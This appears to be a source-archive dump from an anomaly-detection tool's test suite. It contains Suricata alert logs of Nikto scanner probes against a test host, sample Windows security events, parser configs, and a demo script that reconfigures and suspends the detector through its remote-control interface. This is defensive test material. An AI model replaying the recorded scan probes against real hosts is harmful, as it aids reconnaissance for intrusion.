character","id":"86601","firedtimes":89,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.141521","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.650090+0000\",\"flow_id\":303031401506644,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47114,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.650090+0000","flow_id":"303031401506644.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47114","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.653055+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":90,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.143056","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.653055+0000\",\"flow_id\":2084777109418518,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47116,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.back\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.653055+0000","flow_id":"2084777109418518.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47116","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.back","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.655279+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":91,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.144597","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.655279+0000\",\"flow_id\":1361650645662792,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47118,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.password\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.655279+0000","flow_id":"1361650645662792.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47118","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.password","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.657354+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":92,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.146146","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.657354+0000\",\"flow_id\":1.24322121737965e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47120,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.657354+0000","flow_id":"1243221217379650.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47120","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.659892+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":93,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.147689","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.659892+0000\",\"flow_id\":1976543933501226,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47122,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.tw\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.659892+0000","flow_id":"1976543933501226.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47122","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.tw","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"}logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/windows.yml000066400000000000000000000073611437606560100301070ustar00rootroot00000000000000LearnMode: False Log.Encoding: 'utf-8' Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/windows_json_logs/Security_Error.log' - 'file:///tmp/windows_json_logs/Security_Working.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: '' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 2 Parser: - id: machinename type: FixedWordlistDataModelElement name: 'machinename' args: - 'N3IM1703.D03.arc.local' - id: data type: FixedWordlistDataModelElement name: 'data' args: - '' - id: index type: DecimalIntegerValueModelElement name: 'index' - id: categorynumber type: DecimalIntegerValueModelElement name: 'categorynumber' - id: eventid type: DecimalIntegerValueModelElement name: 'eventid' - id: entrytype type: DecimalIntegerValueModelElement name: 'entrytype' - id: source type: VariableByteDataModelElement name: 'source' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: non_empty_elem type: VariableByteDataModelElement name: 'non_empty_elem' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZüäö0123456789-_.:;&%=+$,/?%#\~()\r\n\t ' #- id: non_empty_elem # type: AnyByteDataModelElement # name: 'non_empty_elem' # #args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~Ä ' - id: empty_elem type: FixedWordlistDataModelElement name: 'empty' args: - '' - id: replacementstrings type: FirstMatchModelElement name: 'replacementstrings' args: - non_empty_elem - empty_elem - id: instanceid type: DecimalIntegerValueModelElement name: 'instanceid' - id: timegenerated type: VariableByteDataModelElement name: 'timegenerated' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: timewritten type: VariableByteDataModelElement name: 'timewritten' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: username type: FixedWordlistDataModelElement name: 'username' args: - 'NT-AUTORITÄT' - '\\' - 'SYSTEM' - 'Lokaler Dienst' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: MachineName: machinename Data: data Index: index CategoryNumber: categorynumber EventID: eventid EntryType: entrytype Source: source ReplacementStrings: - replacementstrings InstanceId: instanceid TimeGenerated: timegenerated TimeWritten: timewritten +UserName: username Site: "NULL_OBJECT" Container: "NULL_OBJECT" _empty_list: EMPTY_ARRAY _empty_object: EMPTY_OBJECT Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe json: true type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs/000077500000000000000000000000001437606560100314325ustar00rootroot00000000000000Security_Error.log000066400000000000000000000042221437606560100350360ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":597,"CategoryNumber":12292,"EventID":5058,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-21-1482476501-113007714-839522115-13768","admin-ea","D03","0x4a3e7d","8656","2021-04-22T09:18:20.958953800Z","Microsoft Software Key Storage Provider","UNKNOWN","Microsoft Connected Devices Platform device certificate","%%2500","C:\\Users\\admin-ea\\AppData\\Roaming\\Microsoft\\Crypto\\Keys\\de7cf8a7901d2ad13e5c67c29e5d1662_ccbe96bb-675a-4a22-b29c-5213a99e5b4f","%%2458","0x0"],"InstanceId":5058,"TimeGenerated":"2021-04-22T11:18:22+02:00","TimeWritten":"2021-04-22T11:18:22+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":1956,"CategoryNumber":12554,"EventID":4627,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-18","N3IM1703$","D03","0x3e7","S-1-5-18","SYSTEM","NT-AUTORITT","0x3e7","5","1","1","\r\n\t\t%S-1-5-32-544\r\n\t\t%S-1-1-0\r\n\t\t%S-1-5-11\r\n\t\t%S-1-16-16384"],"InstanceId":4627,"TimeGenerated":"2021-04-28T09:59:47+02:00","TimeWritten":"2021-04-28T09:59:47+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":1956,"CategoryNumber":12554,"EventID":4627,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-18","N3IM1703$","D03","0x3e7","S-1-5-18","SYSTEM","NT-AUTORITT","0x3e7","5","1","1","%S-1-5-32-544%S-1-1-0%S-1-5-11%S-1-16-16384"],"InstanceId":4627,"TimeGenerated":"2021-04-28T09:59:47+02:00","TimeWritten":"2021-04-28T09:59:47+02:00","UserName":null,"Site":null,"Container":null} {"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":12293,"CategoryNumber":13826,"EventID":4799,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["Zugriffssteuerungs-Unterstützungsoperatoren","Builtin","S-1-5-32-579","S-1-5-18","N3IM1703$","D03","0x3e7","0x1680","C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"],"InstanceId":4799,"TimeGenerated":"2021-05-10T09:38:03+02:00","TimeWritten":"2021-05-10T09:38:03+02:00","UserName":null,"Site":null,"Container":null} Security_Working.log000066400000000000000000000011101437606560100353560ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/windows_json_logs{"MachineName":"N3IM1703.D03.arc.local","Data":"","Index":597,"CategoryNumber":12292,"EventID":5058,"EntryType":8,"Source":"Microsoft-Windows-Security-Auditing","ReplacementStrings":["S-1-5-21-1482476501-113007714-839522115-13768","admin-ea","D03","0x4a3e7d","8656","2021-04-22T09:18:20.958953800Z","Microsoft Software Key Storage Provider","UNKNOWN","Microsoft Connected Devices Platform device certificate","%%2500","%%2458","0x0"],"InstanceId":5058,"TimeGenerated":"2021-04-22T11:18:22+02:00","TimeWritten":"2021-04-22T11:18:22+02:00","UserName":null,"Site":null,"Container":null} logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerRemoteControl/000077500000000000000000000000001437606560100257215ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerRemoteControl/aminerRemoteControlDemo.sh000077500000000000000000000176351437606560100330710ustar00rootroot00000000000000#removes the 'LogPrefix' sudo aminerremotecontrol --exec "change_config_property(analysis_context, 'LogPrefix', '')" #renames the 'NewMatchPathValueCombo' component to 'NewMatchPathValueComboDetector' sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')" #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" #prints the current list of target_path_list sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')" #adds a new path to the 'NewMatchPathValueComboDetector' component. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list', ['/model/IPAddresses/Username', '/model/IPAddresses/IP', 'new/path'])" #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to True to start the learning phase. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', True)" sleep 1 #changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False to end the learning phase. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" #prints the 'Resources.MaxMemoryUsage'; changes the property 'Resources.MaxMemoryUsage' to -1, which means all the available memory can be used and prints it again. sudo aminerremotecontrol --data '["Resources.MaxMemoryUsage", -1]' --exec 'print_config_property(analysis_context, "%s" % remote_control_data[0])' --exec 'change_config_property(analysis_context, "%s" % remote_control_data[0], remote_control_data[1])' --exec 'print_config_property(analysis_context, "%s" % remote_control_data[0])' #add a new NewMatchPathDetector to the config. sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet')" sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.atom_handler_list, learn_mode=True), 'NewMatchPathDet1')" #prints the current config to the console. #sudo aminerremotecontrol --exec "print_current_config(analysis_context)" --string-response #saves the current config to /tmp/config.py sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')" #lists all the events from the VolatileLogarithmicBackoffEventHistory component, but the maximal count is 10. sudo aminerremotecontrol --exec "list_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',10)" --string-response #prints the event with the id 12 from the history. sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',12)" --string-response #prints the event with the id 13 from the history. sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',13)" --string-response #prints the event with the id 15 from the history. sudo aminerremotecontrol --exec "dump_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',15)" --string-response #ignores the events with the ids 12,13 and 15 from the history. sudo aminerremotecontrol --exec "ignore_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[12,13,15])" --string-response #allowlists the events with the ids 21,22 and 23 from the history. sudo aminerremotecontrol --exec "allowlist_events_from_history(analysis_context,'VolatileLogarithmicBackoffEventHistory',[21,22,23])" --string-response # Currently following rules must be met to not create a allowlistViolation: # User root (logged in, logged out) or User 'username' (logged in, logged out) x minutes ago. # allowlist_rules = [Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # In the first step we print the current allowlist_rules. Maybe it is necessary to enlarge AnalysisChildRemoteControlHandler.maxControlPacketSize. #sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules')" --string-response # In the second step we add the user admin to not be tracked like the root user by adding another rule. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'admin'))]),Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # In the third step we rename the user admin to the user administrator and leave all other rules. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'administrator'))]),Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # In the last step we remove all special rules and only allow User 'username' (logged in, logged out) x minutes ago. sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context,'Allowlist','allowlist_rules',[Rules.OrMatchRule([Rules.AndMatchRule([Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')),Rules.PathExistsMatchRule('/model/LoginDetails')]),Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])])" # Adds a new path to the known_path_set sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathDet',['/new/path1','/new/path2'])" --string-response # Persist all data. sudo aminerremotecontrol --exec "persist_all()" # List all backups. sudo aminerremotecontrol --exec "list_backups(analysis_context)" # Create a backup. sudo aminerremotecontrol --exec "create_backup(analysis_context)" # suspend the aminer. sudo aminerremotecontrol --exec "suspend" # activate the aminer. sudo aminerremotecontrol --exec "activate" # reopen all StreamPrinterEventHandler streams. sudo aminerremotecontrol --exec "reopen_event_handler_streams(analysis_context)"logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerRemoteControl/demo-config.py000066400000000000000000000502021437606560100304610ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPUWorkload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S')] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('StartTime', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', b' cron['), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', 